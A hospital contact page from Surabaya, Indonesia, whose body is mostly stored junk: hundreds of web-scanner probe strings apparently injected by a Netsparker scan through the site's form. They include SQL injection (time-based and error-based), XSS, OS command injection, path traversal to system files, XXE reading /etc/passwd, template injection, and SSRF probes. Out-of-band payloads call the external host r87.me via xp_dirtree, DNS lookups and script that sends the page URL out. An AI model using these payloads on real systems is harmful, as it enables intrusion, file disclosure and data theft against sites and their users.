Lokasi RSAL


Kontak Kami

Kantor Kami

  • Alamat: JL. Gadung No. 1 Surabaya, Jawa Timur, Indonesia
  • Telepon: (031) 8438153, 8438154
  • Email: rsal.ramelan@yahoo.co.id
  • 3: 3
  • 3: 3
  • :
  • 3: 3
  • %27:
  • -1 OR 1=1: 3
  • n3tsp4rke2:
  • nxtspxrkex:
  • N3TSP4RKE2:
  • ' WAITFOR DELAY '0:0:25'--:
  • -1 OR 1=1: 3
  • '"--></style></scRipt><scRipt>netsparker(0x04708C)</scRipt>:
  • %27: 3
  • -1 OR 1=1: 3
  • "& SET /A 0xFFF9999-92971 &:
  • ' WAITFOR DELAY '0:0:25'--: 3
  • '"--></style></scRipt><scRipt>netsparker(0x04708D)</scRipt>: 3
  • -1 OR 1=1: 3
  • (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns):
  • "& SET /A 0xFFF9999-95289 &: 3
  • 1 WAITFOR DELAY '0:0:25'--:
  • ': 3
  • %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x047094%29%3C%2FscRipt%3E:
  • "& ping -n 25 127.0.0.1 &:
  • (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns): 3
  • NS-1NO: 3
  • '& SET /A 0xFFF9999-98172 &:
  • 1 WAITFOR DELAY '0:0:25'--: 3
  • %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x047095%29%3C%2FscRipt%3E: 3
  • "& ping -n 25 127.0.0.1 &: 3
  • '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +':
  • -1 AND 'NS='ss: 3
  • WAITFOR DELAY '0:0:25'--:
  • '& SET /A 0xFFF9999-53227 &: 3
  • /../../../../../../../../../../boot.ini:
  • '& ping -n 25 127.0.0.1 &:
  • 1'"--></style></scRipt><scRipt>netsparker(0x04709C)</scRipt>:
  • '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +': 3
  • -1' OR 1=1 OR 'ns'='ns: 3
  • WAITFOR DELAY '0:0:25'--: 3
  • & SET /A 0xFFF9999-98248 &:
  • 1'"--></style></scRipt><scRipt>netsparker(0x04709D)</scRipt>: 3
  • '& ping -n 25 127.0.0.1 &: 3
  • /../../../../../../../../../../boot.ini: 3
  • hTTp://r87.com/n:
  • convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))):
  • -1" OR 1=1 OR "ns"="ns: 3
  • 1) WAITFOR DELAY '0:0:25'--:
  • & SET /A 0xFFF9999-25985 &: 3
  • data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDQ3MEEyKTwvc2NyaXB0Pg==:
  • & ping -n 25 127.0.0.1 &:
  • /../../../../../../../../../../boot.ini.php:
  • -1 OR 17-7=10: 3
  • convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))): 3
  • 1) WAITFOR DELAY '0:0:25'--: 3
  • hTTp://r87.com/n: 3
  • SET /A 0xFFF9999-88740 &:
  • data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDQ3MEEzKTwvc2NyaXB0Pg==: 3
  • /../../../../../../../../../../boot.ini.php: 3
  • -1 OR X='ss: 3
  • & ping -n 25 127.0.0.1 &: 3
  • 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=':
  • ') WAITFOR DELAY '0:0:25'--:
  • SET /A 0xFFF9999-10342 &: 3
  • '" ns=netsparker(0x0470B1):
  • http://r87.com/n?.php:
  • 1/../../../../../../../../../../boot.ini:
  • -1' OR 1=1 OR '1'='1: 3
  • ping -n 25 127.0.0.1 &:
  • 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=': 3
  • ') WAITFOR DELAY '0:0:25'--: 3
  • SET /A 0xFFF9999-64267:
  • '" ns=netsparker(0x0470B2): 3
  • http://r87.com/n?.php: 3
  • -1' OR 1=1 OR '1'='1: 3
  • 1/../../../../../../../../../../boot.ini: 3
  • ping -n 25 127.0.0.1 &: 3
  • ')) WAITFOR DELAY '0:0:25'--:
  • SET /A 0xFFF9999-13495: 3
  • 1 ns=netsparker(0x0470BD):
  • -1" OR 1=1 OR "1"="1: 3
  • http://r87.com/n?.php:
  • "&ping -w 25 127.0.0.1 &":
  • file:///boot.ini:
  • ')) WAITFOR DELAY '0:0:25'--: 3
  • | SET /A 0xFFF9999-6714:
  • -1" OR 1=1 OR "1"="1: 3
  • 1 ns=netsparker(0x0470BE): 3
  • http://r87.com/n?.php: 3
  • "&ping -w 25 127.0.0.1 &": 3
  • file:///boot.ini: 3
  • 1)) WAITFOR DELAY '0:0:25'--:
  • -1' OR 1=1 OR '1'='1: 3
  • | SET /A 0xFFF9999-33607: 3
  • //r87.com/n/n.css?0x0470F7:
  • php://filter//resource=http://r87.com/n?.php:
  • '&ping -w 25 127.0.0.1 &':
  • 1)) WAITFOR DELAY '0:0:25'--: 3
  • -1' OR 1=1 OR '1'='1: 3
  • c:\boot.ini:
  • 1";expr 268409241 - 10058;":
  • php://filter//resource=http://r87.com/n?.php: 3
  • //r87.com/n/n.css?0x0470F8: 3
  • '&ping -w 25 127.0.0.1 &': 3
  • 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--:
  • -1" OR 1=1 OR "1"="1: 3
  • c:\boot.ini: 3
  • 1";expr 268409241 - 62911;": 3
  • r87.com/n:
  • &ping -w 25 127.0.0.1 &:
  • //r87.com/n/j/?0x047109:
  • 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--: 3
  • -1" OR 1=1 OR "1"="1: 3
  • 1';expr 268409241 - 6364;':
  • r87.com/n: 3
  • &ping -w 25 127.0.0.1 &: 3
  • //r87.com/n/j/?0x04710A: 3
  • (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))):
  • ': 3
  • 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--:
  • response.write(268409241-68428)':
  • 1';expr 268409241 - 51400;': 3
  • :
  • ping -w 25 127.0.0.1 &:
  • (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))): 3
  • '><net sparker=netsparker(0x047123)>:
  • NS-1NO: 3
  • 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--: 3
  • 1;expr 268409241 - 57392;x:
  • response.write(268409241-93534)': 3
  • %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini:
  • 3: 3
  • ping -w 25 127.0.0.1 &: 3
  • -1 OR 1=1: 3
  • '><net sparker=netsparker(0x047124)>: 3
  • 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--:
  • 1;expr 268409241 - 93489;x: 3
  • +response.write(268409241-99669)':
  • :
  • %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini: 3
  • ping -n 25 127.0.0.1:
  • -1 OR 1=1: 3
  • "><net sparker=netsparker(0x047137)>:
  • 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--: 3
  • {{268409241-52208}}:
  • expr 268409241 - 29224;:
  • +response.write(268409241-70851)': 3
  • 3: 3
  • ping -n 25 127.0.0.1: 3
  • ns:netsparker056650=vuln:
  • -1 OR 1=1: 3
  • file%3a%2f%2f%2fboot.ini:
  • "><net sparker=netsparker(0x047138)>: 3
  • expr 268409241 - 51331;: 3
  • {{268409241-91260}}: 3
  • "+response.write(268409241-56838)+":
  • :
  • ping -w 25 127.0.0.1:
  • -1 OR 1=1: 3
  • ns:netsparker056650=vuln: 3
  • file%3a%2f%2f%2fboot.ini: 3
  • <iMg src=N onerror=netsparker(0x047145)>:
  • expr 268409241 - 84876:
  • ${268409241-87561}:
  • "+response.write(268409241-11215)+": 3
  • ping -w 25 127.0.0.1: 3
  • ': 3
  • 3: 3
  • (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL):
  • http://example.com/? ns: netsparker056650=vuln:
  • <iMg src=N onerror=netsparker(0x047146)>: 3
  • c%3a%5cboot.ini:
  • expr 268409241 - 2355: 3
  • <% response.write(268409241-73352) %>:
  • ${268409241-56024}: 3
  • NS-1NO: 3
  • |ping -n 25 127.0.0.1:
  • :
  • (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL): 3
  • http://example.com/? ns: netsparker056650=vuln: 3
  • javascript:netsparker(0x047177):
  • c%3a%5cboot.ini: 3
  • <!--#exec cmd="expr 268409241 - 35283"-->:
  • <% response.write(268409241-35817) %>: 3
  • -1 AND 'NS='ss: 3
  • =268409241-5420:
  • |ping -n 25 127.0.0.1: 3
  • 3: 3
  • NSFTW:
  • ns:netsparker056650=vuln:
  • -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1:
  • javascript:netsparker(0x047178): 3
  • <!--#exec cmd="expr 268409241 - 25425"-->: 3
  • /../../../../../../../../../../web.config:
  • -1' OR 1=1 OR 'ns'='ns: 3
  • print(int)0xFFF9999-87056:
  • =268409241-78759: 3
  • :
  • :
  • http://r87.com/?rsalramelan.com/:
  • NSFTW: 3
  • ns:netsparker056650=vuln: 3
  • -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1: 3
  • |expr${IFS}268409241${IFS}-${IFS}59427:
  • <scRipt>ns(0x047191)</scRipt>:
  • ${28275*28275-(88432)}:
  • -1" OR 1=1 OR "ns"="ns: 3
  • /../../../../../../../../../../web.config: 3
  • 3: 3
  • {{=268409241-24969}}:
  • print(int)0xFFF9999-34759: 3
  • http://r87.com/?rsalramelan.com/: 3
  • 3: 3
  • '+NSFTW+':
  • ((select sleep(25)))a-- 1:
  • ns:netsparker056650=vuln:
  • |expr${IFS}268409241${IFS}-${IFS}23384: 3
  • -1 OR 17-7=10: 3
  • <scRipt>ns(0x047192)</scRipt>: 3
  • ${28275*28275-(93367)}: 3
  • /../../../../../../../../../../windows/win.ini:
  • : hTTp://r87.com/n
  • http://r87.com/?rsalramelan.com/:
  • {{=268409241-17729}}: 3
  • print(int)0xFFF9999-3289;:
  • '+NSFTW+': 3
  • :
  • ((select sleep(25)))a-- 1: 3
  • ns:netsparker056650=vuln: 3
  • -1 OR X='ss: 3
  • :
  • <%a style=x:expre/**/ssion(netsparker(0x0471A8))>:
  • #{28275*28275-(59087)}:
  • http://r87.com/?rsalramelan.com/: 3
  • /../../../../../../../../../../windows/win.ini: 3
  • 3: hTTp://r87.com/n
  • <%- 268409241-85494 %>:
  • 3: 3
  • print(int)0xFFF9999-80878;: 3
  • -1' OR 1=1 OR '1'='1: 3
  • :
  • 3: 3
  • #{28275*28275-(91092)}: 3
  • <%a style=x:expre/**/ssion(netsparker(0x0471A9))>: 3
  • https://r87.com/?rsalramelan.com/:
  • file:///windows/win.ini:
  • <%- 268409241-77937 %>: 3
  • : http://r87.com/n?.php
  • :
  • +print(int)0xFFF9999-72324;//:
  • :
  • : 3
  • :
  • -1' OR 1=1 OR '1'='1: 3
  • 3: 3
  • :
  • 3:
  • :
  • 3: 3
  • :
  • n;ns:expression(netsparker(0x047215));:
  • https://r87.com/?rsalramelan.com/: 3
  • file:///windows/win.ini: 3
  • #set($c=268409241 - 43511) ${c}:
  • 3: 3
  • 3: http://r87.com/n?.php
  • +print(int)0xFFF9999-47895;//: 3
  • -1" OR 1=1 OR "1"="1: 3
  • N3tSp4rK3R:
  • 3: 3
  • :
  • //r87.com/?http://rsalramelan.com/:
  • 3: 3
  • n;ns:expression(netsparker(0x047216));: 3
  • :
  • /../../../../../../../../../../windows/win.ini.php:
  • #set($c=268409241 - 81182) ${c}: 3
  • : http://r87.com/n?.php
  • '+print(int)0xFFF9999-53978+':
  • -1" OR 1=1 OR "1"="1: 3
  • N3tSp4rK3R: 3
  • :
  • 3: 3
  • //r87.com/?http://rsalramelan.com/: 3
  • NS09?s1?DBL?SNGL?NS09:
  • :
  • 3: 3
  • body{x:expression(netsparker(0x0472C8))}:
  • /../../../../../../../../../../windows/win.ini.php: 3
  • acmpznnyxlp26anbzf9lderite4ohnfwja8dgb66dvm.r87.me:
  • https://rsalramelan.com/trace.axd:
  • <#assign x=268409241 - 64464> ${x?string["0"]}:
  • 3: http://r87.com/n?.php
  • '+print(int)0xFFF9999-35292+': 3
  • 3: 3
  • 3: 3
  • :
  • :
  • r87.com/?rsalramelan.com/:
  • 3: 3
  • NS09?s1?DBL?SNGL?NS09: 3
  • :
  • c:\windows\win.ini:
  • body{x:expression(netsparker(0x0472C9))}: 3
  • acmpznnyxl6huwo2gphsmwqgzdtcsijc-iixw71414y.r87.me: 3
  • https://rsalramelan.com/trace.axd: 3
  • <#assign x=268409241 - 84003> ${x?string["0"]}: 3
  • : php://filter//resource=http://r87.com/n?.php
  • 3: 3
  • "+print(int)0xFFF9999-14738+":
  • :
  • <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>:
  • r87.com/?rsalramelan.com/: 3
  • 3: 3
  • 3: 3
  • : ${28275*28275-(69419)}
  • :
  • 3: 3
  • c:\windows\win.ini: 3
  • */netsparker(0x0472D6);/*:
  • rsalramelan.com/trace.axd:
  • //acmpznnyxlabtiarbonhhl3rh95fnnsl0vvds6nt7ka.r87.me:
  • <%= "#{268409241-87152}" %>:
  • 3: php://filter//resource=http://r87.com/n?.php
  • 3: 3
  • "+print(int)0xFFF9999-61113+": 3
  • 1';SELECT pg_sleep(25)--:
  • 3: 3
  • <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>: 3
  • exec('xp_dirtree ''\\acmpznnyxlbmez9os1x9udasaq0a5cdteztu2a_y'+'rc0.r87.me'+'\c$\a'''):
  • r87.com/?http://rsalramelan.com/:
  • :
  • : N3tSp4rK3R
  • 3: ${28275*28275-(48416)}
  • :
  • '"--></style></scRipt><scRipt src="//acmpznnyxlrn8ww0-lzvsm1w7ayk_f2jguplmnvtvga&#46;r87&#46;me"></scRipt>:
  • 3: 3
  • ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini:
  • */netsparker(0x0472D7);/*: 3
  • //acmpznnyxleusjahgij0uqcxbi82u4jnsgdv6r4hg00.r87.me: 3
  • rsalramelan.com/trace.axd: 3
  • : r87.com/n
  • <%= "#{268409241-1643}" %>: 3
  • 3: 3
  • <?=(int)0xFFF9999-63956;//?>:
  • 1';SELECT pg_sleep(25)--: 3
  • :
  • &thisdoesntexists;:
  • exec('xp_dirtree ''\\acmpznnyxlcqqrpqall-cyvlrngieamj1nglv_-p'+'smw.r87.me'+'\c$\a'''): 3
  • r87.com/?http://rsalramelan.com/: 3
  • 3: 3
  • 3: N3tSp4rK3R
  • : #{28275*28275-(62494)}
  • 3: 3
  • '"--></style></scRipt><scRipt src="//acmpznnyxlrczasgtlheevqmpzfno1golme8p_qy278&#46;r87&#46;me"></scRipt>: 3
  • ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini: 3
  • '+netsparker(0x0472E6)+':
  • : NS09?s1?DBL?SNGL?NS09
  • http://r87.me/r/?id=acmpznnyxleet9vn_tbwxucty5vyutn1xll0qcjyf80:
  • 36.91.147.95/trace.axd:
  • 3: r87.com/n
  • :
  • 3: 3
  • 1;SELECT pg_sleep(25)--:
  • <?=(int)0xFFF9999-20523;//?>: 3
  • 3: 3
  • &thisdoesntexists;: 3
  • r87.com/?https://rsalramelan.com/:
  • http://acmpznnyxlzofnxfavuhcbxnfztkbdpxnjlyagiaawr.r87.me/p/:
  • gethostbyname(trim('acmpznnyxlzqabpulce4gzcn9cf1j0lgh37mquu-'.'bfa.r87.me')):
  • : ns:netsparker056650=vuln
  • 000177.000.00000.000001/trace.axd:
  • 3: #{28275*28275-(85641)}
  • :
  • <iMg src=N onerror="this.onerror='';this.src='//acmpznnyxlysqnsfjuecjb2ryytv9ns7rznbxsen'+'dya.r87.me/r/?'+location.href">:
  • ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini:
  • '+netsparker(0x0472E7)+': 3
  • 3: NS09?s1?DBL?SNGL?NS09
  • http://r87.me/r/?id=acmpznnyxl9hcmwipclolhvgztgcotypxkfeon0mp34: 3
  • 36.91.147.95/trace.axd: 3
  • 3: 3
  • 3: 3
  • 1;SELECT pg_sleep(25)--: 3
  • {php}print(int)0xFFF9999-29475;{/php}:
  • :
  • r87.com/?https://rsalramelan.com/: 3
  • http://acmpznnyxlgn9mqvxblqj9ubwavdvwsnmkasmac2dzd.r87.me/p/: 3
  • gethostbyname(trim('acmpznnyxlzv3ruj3bfr3egieyxll1cerv29uhdt'.'tdo.r87.me')): 3
  • 0177.0.0.1/trace.axd:
  • 3: ns:netsparker056650=vuln
  • 3: 3
  • <iMg src=N onerror="this.onerror='';this.src='//acmpznnyxlv4j-j6quj0qufvvbtwpgxvh4gx1ipt'+'mye.r87.me/r/?'+location.href">: 3
  • "+netsparker(0x0472FD)+":
  • ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini: 3
  • :
  • 127.100.11.2/trace.axd:
  • 3: 3
  • SELECT pg_sleep(25)--:
  • :
  • 1;exec('xp_dirtree ''\\acmpznnyxlrcpvr9afgnnqxhegiwmrok7kpt6hup'+'zpm.r87.me'+'\c$\a''')--:
  • {php}print(int)0xFFF9999-32737;{/php}: 3
  • 3: 3
  • /\r87.com/?rsalramelan.com/:
  • php://filter//resource=http://acmpznnyxlxgzt8054rsprsfotaaohynrqiwktmri3h.r87.me/p/:
  • 0177.0.1/trace.axd:
  • : http://example.com/? ns: netsparker056650=vuln
  • gethostbyname(trim('acmpznnyxljhxkjjsewkehu0qgftptugcz0nyjwh'.'348.r87.me'));:
  • :
  • "+netsparker(0x0472FE)+": 3
  • .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini:
  • 3: 3
  • 127.100.11.2/trace.axd: 3
  • 3: 3
  • SELECT pg_sleep(25)--: 3
  • 1;exec('xp_dirtree ''\\acmpznnyxlwmhntkdh6bt2miy6vxv-owzkqzipwx'+'_rm.r87.me'+'\c$\a''')--: 3
  • 3: 3
  • '{${print(int)0xFFF9999-6969}}':
  • /\r87.com/?rsalramelan.com/: 3
  • :
  • php://filter//resource=http://acmpznnyxley5ypc7zpl0wntf4mocydsdnwy4dsw4dp.r87.me/p/: 3
  • :
  • 0177.1/trace.axd:
  • 3: http://example.com/? ns: netsparker056650=vuln
  • gethostbyname(trim('acmpznnyxl-aba1dbmbeoustohh11q447mvelj2q'.'jvq.r87.me'));: 3
  • 3: 3
  • \';netsparker(0x047329);///:
  • :
  • .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini: 3
  • ::1/trace.axd:
  • '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+':
  • 3: 3
  • -1';exec('xp_dirtree ''\\acmpznnyxlqvxy5cng_cotliejzjl3jkw-2nbhro'+'w9y.r87.me'+'\c$\a''')--:
  • 1);SELECT pg_sleep(25)--:
  • :
  • ///r87.com/?rsalramelan.com/:
  • '{${print(int)0xFFF9999-35389}}': 3
  • acmpznnyxlwlqh5g5fofslak1uiv6t9rxwyjj-fpdsf.r87.me/p/:
  • 3: 3
  • 017700000001/trace.axd:
  • 3: 3
  • : ns:netsparker056650=vuln
  • +gethostbyname(trim('acmpznnyxlxwo8sjp62qljwpy3eu-k_cit0sggbg'.'nu4.r87.me'));//:
  • <fRame src=N onload="this.onload='';this.src='//acmpznnyxlilqbme_b7vl54-ogm0kplvffczfeux'+'se8.r87.me/r/?'+location.href">:
  • :
  • \';netsparker(0x04732A);///: 3
  • 3: 3
  • . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini:
  • '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+': 3
  • ::1/trace.axd: 3
  • 3: 3
  • -1';exec('xp_dirtree ''\\acmpznnyxlbpki_zxc5fx8zvuy7dmmbr3fz-sneq'+'sz8.r87.me'+'\c$\a''')--: 3
  • 1);SELECT pg_sleep(25)--: 3
  • ///r87.com/?rsalramelan.com/: 3
  • 3: 3
  • acmpznnyxlyhhzapddsiqd3cyr6qfd4uy_lrypdsiwr.r87.me/p/: 3
  • [php]print(int)0xFFF9999-27143;[/php]:
  • :
  • 0x7f.0.0.1/trace.axd:
  • :
  • 3: ns:netsparker056650=vuln
  • +gethostbyname(trim('acmpznnyxlbwxgx1p47w3f4emdgmjwqoj-xj13mg'.'-nw.r87.me'));//: 3
  • <fRame src=N onload="this.onload='';this.src='//acmpznnyxlqhmz7uhqzo16n0jzqfvmvppdnxdi9c'+'_zo.r87.me/r/?'+location.href">: 3
  • 3: 3
  • &#39;,netsparker(0x047397),&#39;:
  • :
  • . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini: 3
  • 3: 3
  • 127.0.0.1/trace.axd:
  • 1) exec('xp_dirtree ''\\acmpznnyxl7rmmkhyzh838jswylm31xy6dtgmgio'+'o_g.r87.me'+'\c$\a''')--:
  • 1');SELECT pg_sleep(25)--:
  • <iframe src="http://r87.com/?"></iframe>:
  • :
  • :
  • 3: 3
  • [php]print(int)0xFFF9999-66678;[/php]: 3
  • 0x7f.0.1/trace.axd:
  • '+gethostbyname(trim('acmpznnyxl6gg7pkhdmdjpjmisb0ppypiyu1xxyn'.'xyq.r87.me'))+':
  • 3: 3
  • : ns:netsparker056650=vuln
  • :
  • &#39;,netsparker(0x047398),&#39;: 3
  • 3: 3
  • /../../../../../../../../../../windows/iis6.log:
  • 3: 3
  • 1) exec('xp_dirtree ''\\acmpznnyxl_w32upe-xeog7xhmyni-gszly2fzs6'+'sxs.r87.me'+'\c$\a''')--: 3
  • 1');SELECT pg_sleep(25)--: 3
  • 127.0.0.1/trace.axd: 3
  • <iframe src="http://r87.com/?"></iframe>: 3
  • 3: 3
  • 3: 3
  • :
  • 0x7f.1/trace.axd:
  • '+gethostbyname(trim('acmpznnyxlz830nh6t2dwhn4vk1efksg89ao1jpk'.'3oo.r87.me'))+': 3
  • : <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>
  • 3: ns:netsparker056650=vuln
  • 3: 3
  • netsparker(0x0473ED):
  • : acmpznnyxlyvyvlrktjbeo6l4tchkruoek8wndp9-ye.r87.me
  • 3: 3
  • 1')exec('xp_dirtree ''\\acmpznnyxlws_lzrt0we16esemfhdkbq-2vqv4pe'+'ft8.r87.me'+'\c$\a''')--:
  • /../../../../../../../../../../windows/iis6.log: 3
  • 1'));SELECT pg_sleep(25)--:
  • rsalramelan.com.r87.com/?:
  • :
  • [::1]/trace.axd:
  • 3: 3
  • 0x7f000001/trace.axd:
  • :
  • "+gethostbyname(trim('acmpznnyxlqvderphs166fz9cmdftudd1p0404ii'.'uig.r87.me'))+":
  • 3: <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>
  • :
  • netsparker(0x0473EE): 3
  • :
  • 3: acmpznnyxlkrju7fgubj6dysvi2nnerp-8m2ylomv4c.r87.me
  • 3: 3
  • 1')exec('xp_dirtree ''\\acmpznnyxl2_y0-z7rv19ua6nfexwhre-7txfiq1'+'qiw.r87.me'+'\c$\a''')--: 3
  • 1'));SELECT pg_sleep(25)--: 3
  • rsalramelan.com.r87.com/?: 3
  • /../../../../../../../../../../proc/self/fd/2:
  • 3: 3
  • 127.0.0.1/trace.axd:
  • [::1]/trace.axd: 3
  • :
  • "+gethostbyname(trim('acmpznnyxlsncba5txe3adayokp5qtqjrfjuvawy'.'i88.r87.me'))+": 3
  • 3: 3
  • print localtime()*0+0xFFF9999-5116:
  • : <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>
  • 3: 3
  • netsparker(0x047432);:
  • 3: 3
  • 3: 3
  • :
  • 1))exec('xp_dirtree ''\\acmpznnyxl_nnpdseil1ioizhzsklyepweemliby'+'n30.r87.me'+'\c$\a''')--:
  • : //acmpznnyxl2otruyjk6nnpjpirozgeflqwvnsa3snsi.r87.me
  • 1));SELECT pg_sleep(25)--:
  • : <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://acmpznny"><!ENTITY % d "xlg99zc3fv-urwljgidg7k-965tjtfgpoac.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
  • http://rsalramelan.com.r87.com/?:
  • :
  • 127.0.1/trace.axd:
  • /../../../../../../../../../../proc/self/fd/2: 3
  • https://rsalramelan.com/elmah.axd:
  • <? gethostbyname(trim('acmpznnyxlfmtljlps2zjeqchv45wgwhkcrmh3ie'.'nde.r87.me'));//?>:
  • 3: 3
  • :
  • print localtime()*0+0xFFF9999-20510: 3
  • 3: <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>
  • :
  • : "& ping -n 25 127.0.0.1 &
  • netsparker(0x047433);: 3
  • 3: 3
  • 1))exec('xp_dirtree ''\\acmpznnyxltnwujh0ekj5s2bnbtenpiec5r-7_o0'+'o9m.r87.me'+'\c$\a''')--: 3
  • 3: 3
  • 3: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://acmpznny"><!ENTITY % d "xlnk1jnlhyj5foo-ii98fwpnulr6p6j87jk.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
  • 1));SELECT pg_sleep(25)--: 3
  • 3: //acmpznnyxlwprbsyagktkm7gwsn9jqgoufh_dd-olpc.r87.me
  • http://rsalramelan.com.r87.com/?: 3
  • 3: 3
  • 127.1/trace.axd:
  • <? gethostbyname(trim('acmpznnyxl3dzfizho1-jnauyv_-v6wbdp6lo44b'.'sdg.r87.me'));//?>: 3
  • /../../../../../../../../../../proc/self/fd/2.php:
  • https://rsalramelan.com/elmah.axd: 3
  • :
  • eval('print localtime()*0+0xFFF9999-95302'):
  • 3: 3
  • : &thisdoesntexists;
  • 3: "& ping -n 25 127.0.0.1 &
  • 3: 3
  • 3: 3
  • 1'))exec('xp_dirtree ''\\acmpznnyxljcnzkzh7x1rspk3kpvs9frm1f_4phu'+'yaw.r87.me'+'\c$\a''')--:
  • &#39;+netsparker(0x04745A)+&#39;:
  • : <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://acmpznny"><!ENTITY % d "xlv5uv7plyp1b6j92tzs3jiidrdmft4wd4s.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
  • :
  • ((SELECT(1)FROM(SELECT(SLEEP(25)))A)):
  • https://rsalramelan.com.r87.com/?:
  • : http://acmpznnyxlrcdcyw1kc5d5bqwtb-5u789utajbt5wpj.r87.me/p/
  • 16777343/trace.axd:
  • : http://r87.me/r/?id=acmpznnyxlo7flejkkcx8u01tqynp9syrm8buyc1bb0
  • '{${gethostbyname(trim('acmpznnyxllc-mdosuiqtx10kq_3tluyso3bo4xk'.'j0o.r87.me'))}}':
  • /../../../../../../../../../../proc/self/fd/2.php: 3
  • eval('print localtime()*0+0xFFF9999-91095'): 3
  • rsalramelan.com/elmah.axd:
  • 3: 3
  • :
  • 3: &thisdoesntexists;
  • :
  • 3: 3
  • : '& ping -n 25 127.0.0.1 &
  • :
  • 1'))exec('xp_dirtree ''\\acmpznnyxlxynnshzuf-wuj3capgyg00i6ncepc7'+'1uc.r87.me'+'\c$\a''')--: 3
  • 3: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://acmpznny"><!ENTITY % d "xlkucl4wpmqxommbp8hrrwrswk_-6qxkva0.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
  • &#39;+netsparker(0x04745B)+&#39;: 3
  • 3: 3
  • https://rsalramelan.com.r87.com/?: 3
  • ((SELECT(1)FROM(SELECT(SLEEP(25)))A)): 3
  • 3: http://acmpznnyxlqh_hagkvbzvd-wroqas9ikz-nv3fosotj.r87.me/p/
  • 00044.00133.0000223.00000137/trace.axd:
  • '{${gethostbyname(trim('acmpznnyxlpgdir2ex9rwssbmffnjoxagal3kgew'.'mhu.r87.me'))}}': 3
  • 3: http://r87.me/r/?id=acmpznnyxla3wpm054aqhdlr2rudiixn6pxbkucrhfg
  • /../../../../../../../../../../etc/httpd/logs/error.log:
